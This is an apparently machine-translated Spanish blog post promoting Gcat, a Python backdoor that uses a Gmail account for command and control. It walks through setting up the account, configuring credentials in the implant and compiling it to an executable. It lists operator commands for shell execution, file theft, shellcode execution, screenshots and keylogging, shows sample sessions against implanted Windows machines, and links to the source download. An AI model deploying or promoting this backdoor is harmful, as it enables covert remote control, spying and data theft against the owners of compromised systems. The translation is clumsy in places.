Gcat es un backdoor Python sigiloso que utiliza Gmail como un servidor de comando y control. Es bastante básico en este momento, pero es una interesante prueba de concepto y si la comunidad se puso detrás de ella y contribuyó algunas nuevas características que podría ser una muy poderosa pieza de equipo.
Gcat es un backdoor Python sigiloso
(https://farm1.staticflickr.com/622/21220320835_41f627a378.jpg)
Cuanto a prestaciones que no tiene que mucho, no puedes subir archivos todavía, pero usted puede ejecutar código shell, descargar archivos y capturas de pantalla de captura.
Pero como concepto es genial, el tráfico de correo electrónico? ¿Cuántas organizaciones bloquearán que, sobre todo a los servidores de Google. Camino menos visible que el tráfico típico de IRC.
SetupConfiguraciónPara que esto funcione se necesita: Una cuenta de Gmail (Utilice una cuenta dedicada! No utilice su ser personal!)
Encienda "Permitir aplicaciones menos seguras" en virtud de la configuración de seguridad de la cuenta
Este repo contiene dos archivos: gcat.py una secuencia de comandos que se utiliza para enumerar y tema ordena a los clientes disponibles
implant.py la puerta trasera real de implementar
En ambos archivos, editar los gmail_user y gmail_pwd variables con el nombre de usuario y la contraseña de la cuenta que previamente configuración.
Usted está probablemente va a querer compilar implant.py en un archivo ejecutable utilizando PyInstaller.
OpcionesGcat
optional arguments:
-h, --help show this help message and exit
-v, --version show program's version number and exit
-id ID Client to target
-jobid JOBID Job id to retrieve
-list List available clients
-info Retrieve info on specified client
Commands:
Commands to execute on an implant
-cmd CMD Execute a system command
-download PATH Download a file from a clients system
-exec-shellcode FILE Execute supplied shellcode on a client
-screenshot Take a screenshot
-lock-screen Lock the clients screen
-force-checkin Force a check in
-start-keylogger Start keylogger
-stop-keylogger Stop keylogger
Usando Gcat
#~ python gcat.py -list
f964f907-dfcb-52ec-a993-543f6efc9e13 Windows-8-6.2.9200-x86
90b2cd83-cb36-52de-84ee-99db6ff41a11 Windows-XP-5.1.2600-SP3-x86
Una vez que haya implementado la puerta de atrás en un par de sistemas, puede comprobar los clientes disponibles utilizando el comando list:
La salida es una cadena UUID que identifica de forma exclusiva el sistema y el sistema operativo el implante se está ejecutando en
Vamos a emitir un comando a un implante:
#~ python gcat.py -id 90b2cd83-cb36-52de-84ee-99db6ff41a11 -cmd 'ipconfig /all'
[*] Command sent successfully with jobid: SH3C4gv
Aquí le estamos diciendo 90b2cd83-cb36-52de-84ee-99db6ff41a11 ejecutar ipconfig / all, el guión y luego da salida a la JobID que podemos utilizar para recuperar la salida de ese comando
Permite obtener los resultados!
#~ python gcat.py -id 90b2cd83-cb36-52de-84ee-99db6ff41a11 -jobid SH3C4gv
DATE: 'Tue, 09 Jun 2015 06:51:44 -0700 (PDT)'
JOBID: SH3C4gv
FG WINDOW: 'Command Prompt - C:\Python27\python.exe implant.py'
CMD: 'ipconfig /all'
Windows IP Configuration
Host Name . . . . . . . . . . . . : unknown-2d44b52
Primary Dns Suffix . . . . . . . :
Node Type . . . . . . . . . . . . : Unknown
IP Routing Enabled. . . . . . . . : No
WINS Proxy Enabled. . . . . . . . : No
-- SNIP --
Downlaod Github : https://github.com/byt3bl33d3r/gcat/archive/master.zip (https://github.com/byt3bl33d3r/gcat/archive/master.zip)
FUENTES: http://www.darknet.org.uk/2015/09/gcat-python-backdoor-using-gmail-for-command-control/ (http://www.darknet.org.uk/2015/09/gcat-python-backdoor-using-gmail-for-command-control/)
:3 Muy lindo, hay algo parecido pero utilizando twitter, pueden leer sobre eso aquí para los interesados
http://www.hackplayers.com/2015/09/twittor-un-backdoor-escrito-en-python-que-usa-twitter.html